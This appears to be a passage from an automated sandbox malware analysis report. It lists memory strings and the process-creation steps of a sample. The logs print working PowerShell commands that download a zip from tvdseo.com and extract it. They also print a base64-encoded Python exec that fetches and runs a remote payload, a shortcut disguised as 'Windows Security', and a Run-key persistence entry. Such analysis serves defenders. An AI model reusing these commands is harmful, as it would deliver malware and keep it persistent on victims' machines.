      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-debug_31bf3856ad364e35_10.0.19041.1741_none_78a9b11b7a3cc41bd246bdamumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..izationv2.resources_31bf3856ad364e35_10.0.19041.1_en-gb_7788797720472f2dmumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..ck-virtualizationv2_31bf3856ad364e35_10.0.19041.1_none_25a2ff96aac272dd7mumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-emulatedstorage_31bf3856ad364e35_10.0.19041.1741_none_4fe99c993cb84326mumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-i..nents-rdv.resources_31bf3856ad364e35_10.0.19041.1_en-us_b3d1ef0d088d6955cmumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-ram-parser.resources_31bf3856ad364e35_10.0.19041.1_en-us_50c23e4c771f203a7mumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-kmcl_31bf3856ad364e35_10.0.19041.1889_none_e7d7bde611c8c1412494c595902f8cmumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..rvcluster.resources_31bf3856ad364e35_10.0.19041.1_en-gb_71570953289cd4d0mumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-winhvr_31bf3856ad364e35_10.0.19041.1_none_fc5d2e67adee561191b2fdaefe65ac87mumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-winsock-provider_31bf3856ad364e35_10.0.19041.867_none_b57fce26790eec135ac87mumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-pvhd-parser.resources_31bf3856ad364e35_10.0.19041.1_en-us_0ccb9f47517187447mumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmms.resources_31bf3856ad364e35_10.0.19041.1_en-us_fc0cba9450a5279026mumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-integration-rdv-core_31bf3856ad364e35_10.0.19041.964_none_3542494c595902f8cmumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vid_31bf3856ad364e35_10.0.19041.546_none_58a869077fc6e2f71222bcd8326mumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vsmb.resources_31bf3856ad364e35_10.0.19041.423_en-us_f14a4bbefe65ac87mumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-hypervcluster_31bf3856ad364e35_10.0.19041.1_none_a2ace16370124ff44326mumm949.mummm65.mumum
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: Yara matchFile source: amsi64_3796.amsi.csv, type: OTHER
      Source: Yara matchFile source: dropped/ConDrv, type: DROPPED
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM synaptics.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://tvdseo.com/file/synaptics.zip', [System.IO.Path]::GetTempPath() + 'EAnLaxUKaI.zip') "Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $dst = [System.IO.Path]::Combine([System.Environment]::GetFolderPath('LocalApplicationData'), 'EAnLaxUKaI'); Add-Type -AssemblyName System.IO.Compression.FileSystem; if (Test-Path $dst) { Remove-Item -Recurse -Force "$dst\*" } else { New-Item -ItemType Directory -Force $dst } ; [System.IO.Compression.ZipFile]::ExtractToDirectory([System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), 'EAnLaxUKaI.zip'), $dst) "Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $s = $payload = "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHBzOi8vdHZkc2VvLmNvbS9maWxlL1BYQS9QWEFfUFVSRV9FTkMnKS5yZWFkKCkuZGVjb2RlKCd1dGYtOCcpKSk='))";$obj = New-Object -ComObject WScript.Shell;$link = $obj.CreateShortcut("$env:LOCALAPPDATA\WindowsSecurity.lnk");$link.WindowStyle = 7;$link.TargetPath = "$env:LOCALAPPDATA\EAnLaxUKaI\synaptics.exe";$link.IconLocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13";$link.Arguments = "-c `"$payload`"";$link.Save() "Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security' -PropertyType String -Value 'C:\Windows\Explorer.EXE C:\Users\user\AppData\Local\WindowsSecurity.lnk' -Force "Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Users\user\AppData\Local\EAnLaxUKaI\synaptics.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHBzOi8vdHZkc2VvLmNvbS9maWxlL1BYQS9QWEFfUFVSRV9FTkMnKS5yZWFkKCkuZGVjb2RlKCd1dGYtOCcpKSk='))" Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM synaptics.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://tvdseo.com/file/synaptics.zip', [system.io.path]::gettemppath() + 'eanlaxukai.zip') "
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $dst = [system.io.path]::combine([system.environment]::getfolderpath('localapplicationdata'), 'eanlaxukai'); add-type -assemblyname system.io.compression.filesystem; if (test-path $dst) { remove-item -recurse -force "$dst\*" } else { new-item -itemtype directory -force $dst } ; [system.io.compression.zipfile]::extracttodirectory([system.io.path]::combine([system.io.path]::gettemppath(), 'eanlaxukai.zip'), $dst) "
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo new-itemproperty -path 'hkcu:\software\microsoft\windows\currentversion\run' -name 'windows security' -propertytype string -value 'c:\windows\explorer.exe c:\users\user\appdata\local\windowssecurity.lnk' -force "
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\users\user\appdata\local\eanlaxukai\synaptics.exe" -c "import base64;exec(base64.b64decode('aw1wb3j0ihvybgxpyi5yzxf1zxn0o2ltcg9ydcbiyxnlnjq7zxhlyyhiyxnlnjquyjy0zgvjb2rlkhvybgxpyi5yzxf1zxn0lnvybg9wzw4oj2h0dhbzoi8vdhzkc2vvlmnvbs9mawxll1byqs9qweffufvsrv9ftkmnks5yzwfkkckuzgvjb2rlkcd1dgytoccpksk='))"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://tvdseo.com/file/synaptics.zip', [system.io.path]::gettemppath() + 'eanlaxukai.zip') "Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $dst = [system.io.path]::combine([system.environment]::getfolderpath('localapplicationdata'), 'eanlaxukai'); add-type -assemblyname system.io.compression.filesystem; if (test-path $dst) { remove-item -recurse -force "$dst\*" } else { new-item -itemtype directory -force $dst } ; [system.io.compression.zipfile]::extracttodirectory([system.io.path]::combine([system.io.path]::gettemppath(), 'eanlaxukai.zip'), $dst) "Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo new-itemproperty -path 'hkcu:\software\microsoft\windows\currentversion\run' -name 'windows security' -propertytype string -value 'c:\windows\explorer.exe c:\users\user\appdata\local\windowssecurity.lnk' -force "Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\users\user\appdata\local\eanlaxukai\synaptics.exe" -c "import base64;exec(base64.b64decode('aw1wb3j0ihvybgxpyi5yzxf1zxn0o2ltcg9ydcbiyxnlnjq7zxhlyyhiyxnlnjquyjy0zgvjb2rlkhvybgxpyi5yzxf1zxn0lnvybg9wzw4oj2h0dhbzoi8vdhzkc2vvlmnvbs9mawxll1byqs9qweffufvsrv9ftkmnks5yzwfkkckuzgvjb2rlkcd1dgytoccpksk='))" Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
